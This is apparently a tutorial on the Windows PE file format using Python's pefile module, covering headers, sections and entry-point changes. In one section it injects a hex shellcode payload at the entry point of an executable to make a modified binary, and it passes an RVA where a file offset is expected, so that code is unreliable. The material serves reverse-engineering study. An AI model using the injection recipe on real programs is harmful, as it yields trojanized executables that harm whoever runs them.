PE stand for Portable Executable that is native file format for Win32. Portable Executable file format is universal across all win32 platform. All Win32 executables like Control Panel Applets (.CPL ), 32bit DLLs, COM files, .NET executables and also NT’s kernel mode drivers. Note that VxDs(virtual device drivers)  and 16 bit DLLs not use PE file format.

PE file format:

pe file structure

The general outlook of PE file is like shown in figure. PE file mainly have DOS Header, PE Header & Sections. Let have a look on every part.

DOS MZ header: PE files starts with DOS header of 64 bytes. Its structure (IMAGE_DOS_HEADER) is defined in winnt.h or windows.inc that composes of 19 members but only two that is magic and Ifnew are most important.

magic– has value 4Dh, 5Ah that signifies a valid DOS header (“MZ stand for Mark Zbikowsky one of MS-DOS designer)

Ifnew-indicates offset of PE header and PE signature at start of PE header.

DOS Stub: When OS is not able to recognize the PE file then it will execute the EXE (DOS stub). So it is like valid EXE.

PE Header: Its structure is IMAGE_NT_HEADERS that contains all necessary fields used by PE loader. It is defined in windows.inc and mainly have 3 parts that is:

Signature: is 32 bit (DWORD) containing the value 50h, 45h, 00h, 00h (“PE” followed by two terminating zeroes).

FileHeader: Next 20 bytes of PE file. It has various information about physical layout (IMAGE_FILE_HEADER) & properties of file e.g. number of sections.

OptionalHeader: next 224 bytes and contains info about the logical layout (IMAGE_OPTIONAL_HEADERS) inside the PE file e.g. AddressOfEntryPoint, ImageBase, SectionAlignment, FileAlignment, SizeOfImage, SizeOfHeaders & DataDirectory(16 IMAGE_DATA_DIRECTORY array structure at last 128 bytes that relate import address table).

SectionTable: It is an array of IMAGE_SECTION_HEADER structure. There may be a variable section depends upon the file but every section has unique attributes. In one section data/code of common attribute is placed. Some of the sections are:

Code section: .text contains the executable instructions
Data Section: .bss –>uninitialized variables; .rdata->read only variables; .data->initialized variables
Export data: .edata->names and addresses of exported functions as well as Export Directory
Import data: .idata-> names and variables of imported functions as well as Import Descriptor and IAT.

So when PE file loading into the memory the various steps occur are:

  • When we run PE file, First of all PE loader examines the DOS MZ header for the offset of the PE header. If not found then execute DOS stub otherwise skips to the PE header.
  • Then PE loader checks the validity of PE header. If ok, goes to the end of PE header.
  • Using file mapping PE header reads information about the sections and maps those sections into memory. It also gives each section the attributes as specified in the section table.
  • After PE file is mapped into memory, the PE loader concerns itself with the logical parts of the PE file, such as the import table.

[Do Some Practical]:

PE Headers: Basic PE information is can be retrieve by reading various attributes

  • DOS_HEADER
  • FILE_HEADER
  • OPTIONAL_HEADER

Using pefile module in python we can find header information like:

>>> import pefile

>>> ab=”notepad.exe”

>>> pe=pefile.PE(ab)

>>> print pe.DOS_HEADER

Output:

[IMAGE_DOS_HEADER]

0x0        0x0   e_magic:                   0x5A4D

0x2        0x2   e_cblp:                      0x90

0x4        0x4   e_cp:                          0x3

0x6        0x6   e_crlc:                        0x0

0x8        0x8   e_cparhdr:                 0x4

0xA        0xA   e_minalloc:               0x0

0xC        0xC   e_maxalloc:               0xFFFF

0xE        0xE    e_ss:                           0x0

0x10       0x10  e_sp:                         0xB8

0x12       0x12  e_csum:                    0x0

0x14       0x14   e_ip:                         0x0

0x16       0x16  e_cs:                          0x0

0x18       0x18  e_lfarlc:                     0x40

0x1A       0x1A  e_ovno:                     0x0

0x1C       0x1C  e_res:

0x24       0x24  e_oemid:                    0x0

0x26       0x26  e_oeminfo:                0x0

0x28       0x28  e_res2:

0x3C       0x3C  e_lfanew:                   0xE8

Similarly we can find out NT_HEADER, FILE_HEADER, OPTIONAL_HEADER

>>> print pe.NT_HEADER

>>> print pe.FILE_HEADER

>>> print pe.OPTIONAL_HEADER

>>> print pe.FILE_HEADER

[IMAGE_FILE_HEADER]

0xEC       0x0   Machine:                       0x8664

0xEE       0x2   NumberOfSections:              0x6

0xF0       0x4   TimeDateStamp:             0x4A5BC9B3 [Mon Jul 13 23:56:35 2009 UTC]

0xF4       0x8   PointerToSymbolTable:          0x0

0xF8       0xC   NumberOfSymbols:               0x0

0xFC       0x10  SizeOfOptionalHeader:          0xF0

0xFE       0x12  Characteristics:               0x22

We can also find specific field like

>>> print “e_magic value = %s” %hex(pe.DOS_HEADER.e_magic)

e_magic value = 0x5a4d

 

>>> print “e_lfanew value = %s” %hex(pe.DOS_HEADER.e_lfanew)

e_lfanew value = 0xe8

 

>>> print “Address of Entry Point = %s” %hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint)

Address of Entry Point = 0x3570

 

>>> print “Numbers of Sections = %s”%hex(pe.FILE_HEADER.NumberOfSections)

Numbers of Sections = 0x6

 

>>> print “Number of Data_Directories= %d” %pe.OPTIONAL_HEADER.NumberOfRvaAndSizes

Number of Data_Directories= 16

PE Sections:

Using same code we can retrieve section structure, its content of attributes etc.

>>> for section in pe.sections:

print “\t” +section.Name

.text

.rdata

.data

.pdata

.rsrc

.reloc

>>>

If want to display individual section:

>>> print pe.sections[0]

[IMAGE_SECTION_HEADER]

0x1F0      0x0   Name:                          .text

0x1F8      0x8   Misc:                          0xA770

0x1F8      0x8   Misc_PhysicalAddress:          0xA770

0x1F8      0x8   Misc_VirtualSize:              0xA770

0x1FC      0xC   VirtualAddress:                0x1000

0x200      0x10  SizeOfRawData:                 0xA800

0x204      0x14  PointerToRawData:              0x600

0x208      0x18  PointerToRelocations:          0x0

0x20C      0x1C  PointerToLinenumbers:          0x0

0x210      0x20  NumberOfRelocations:           0x0

0x212      0x22  NumberOfLinenumbers:           0x0

0x214      0x24  Characteristics:               0x60000020

>>>

Similarly we can retrieve DATA_DIRECTORIES.

>>> for d_dir in pe.OPTIONAL_HEADER.DATA_DIRECTORY:

print d_dir

We can dump all attributes using a single command:

>>> print pe.dump_info()

Modify Address Of Entry Point:

We can change the address of OEP(Original Entry Point). This will help when we manually unpacking a packed file where change in Address_Of_Entry_Point to OEP is required.

>>> import pefile

>>> aud=”audconv.exe”

>>> pe=pefile.PE(aud)

>>> print “Address_Of_Entry_Point = %s”%hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint)

Address_Of_Entry_Point = 0x36201

>>> pe.OPTIONAL_HEADER.AddressOfEntryPoint=0x40000

>>> pe.write(filename=”audio.exe”)

>>> print “Address_Of_Entry_Point= %s”%hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint)

Address_Of_Entry_Point= 0x40000

>>>

Inject Code at Entry Point:

We can inject code (may be malicious) into the executable at the entry point. So that when application run our code will execute. For injection we use set_bytes_at_offset() method. It returns true or false depending on the success of the operation.

>>> import pefile

>>> aud=”audconv.exe”

>>> pe=pefile.PE(aud)

>>> print “Address %s”%hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint)

Address 0x36201

>>> x=pe.OPTIONAL_HEADER.AddressOfEntryPoint

>>> shellcode = (   “\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30”

“\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff”

“\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2”

“\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85”

“\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3”

“\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d”

“\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58”

“\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b”

“\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff”

“\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00”

“\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56”

“\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75”

“\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x00”)

>>> print “write %d bytes at offset(Entry Point) %s”%(len(shellcode),hex(x))

write 195 bytes at offset(Entry Point) 0x36201

>>> pe.set_bytes_at_offset(x,shellcode)

True

>>> pe.write(filename=”newaud.exe”)

>>> pe.write(“abcd.exe”)

set_bytes_at_offset takes two parameters offset and data. Offset that point to the destination where the data is to be copied. Data contains the our code that to be copy (str).

Differentiate between DLL and EXE:

There are many GUI tools like Resource Hacker, PE Explorer, PE browse, dependency walker, PEid, PEviewfor analyzing PE file. We can differentiate between EXE and DLL by seeing at the Characteristics attribute of File_Header. It is easy to load the application into PE Explorer tool and see the Characteristic field that tell it is DLL or EXE.

pefile3